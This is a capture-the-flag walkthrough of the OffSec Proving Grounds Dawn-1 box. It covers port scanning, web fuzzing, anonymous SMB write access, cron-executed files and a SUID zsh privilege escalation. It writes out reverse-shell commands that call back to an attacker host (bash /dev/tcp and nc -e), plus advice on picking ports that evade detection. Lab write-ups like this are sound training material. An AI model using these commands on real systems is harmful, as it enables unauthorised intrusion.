Hop onto Proving Grounds at: https://portal.offsec.com/labs/play
Login, connect via VPN.
Activate the Dawn-1 Box and you’ll have an IP address to start targeting.
– #nmap -sSV -T4 -p- –open [targetIP]
– 80, 139, 445, 3306 are open. Awesome. Seems like an SMB box today. mysql on 3306 though.
– 139/445 are netbios-ssn Samba smbd 3.x on 139 and samba smbd 4.9.5-Debian on 445
– $searchsploit both to find a potential vuln.
– smbclient
– Gobuster on TCP/80 for file and dir fuzzing.
– nmap -p138,445 –script=smb-vuln-* [TargetIP] shows it vulnerable to DOS but that’s useless here.
– wfuzz -c -z file /ope/SecLists/Discovery//Web-Content/raft-large-words.txt -hc 404 [TargetIP]
– wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt -hc 404 [TargetIP]
– http://targetIP/.DS_STORE nto found, nor robots.txt
– wfuzz found http://targetIP/logs/management.log where we find some files with permission changes to 777. Score!
– In the log file, we see Genimedes and Dawn as usernames. (shock)
– We can probably write to the 777 permission files. Maybe one is a cronjob or something to be executed.
– /home/dawn/ITDEPT/web-control is 777 perms.
– For now, nmap -p 139,445 –script=smb-enum-shares TargetIP shows print$, IPC$ and a share called \\targetIP\ITDEPT
– Let’s go old school with $enum4linux TargetIP and we get in as anonymous with READ\WRITE access! Nice server, buddy
– smbclient //targetIP/IPDEPT -N (Null session), we connect but the share is empty.
– The management.log file said there were two files in there: product-control and web-control, both with 777 perms which means we can probably do a LFI
– It’s also the webroot lol. Here we go!
– Echo bash -c ‘bash -i >& /dev/tcp/1.2.3.4/443 0>&1’ >product-control then call it with a browser or shell. Both work.
– This will cause it to call back into our listener for a basic shell, then priv esc from there.
– nc -nvlp 443 (TCP/443 is probably allowed out their firewall AND it will blend in with normal traffic. Don’t use ports like 4444 because that would stick out and maybe be blocked anyhow
– We’ll also try a reverse shell in the other file in web root we found in management.log echo “nc 1.2.3.4 9090 -e /bin/bash” >web-control
– smbclient //targetIP/ITDEPT -N (Null Session) where we have READ/WRITE we found from smbclient
– We copy our two files, web-control and product-control with our reverse shells onto the smb share.
– A few seconds later, the reverse shell was executed and we got Unprivileged shell. Now privilege escalation.
– python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ to solidify our shall to bash.
– Test shell with Ctrl+z, then $stty raw -echo ;fg ; reset – worked great.
– $tty to view our shell as /dev/pts/0. Nobody else on the box.
– Simply run $find / -perm -4000 2> /dev/null to find zsh as SUID bit. You could also run linpeas.sh from github or madlinux.com/linpeas.sh.
– run $zsh and BOOM, root. cat /root/proof.txt
– Done.
PS I repeated this box earlier but it was different enough that I forgot I did the box already lol.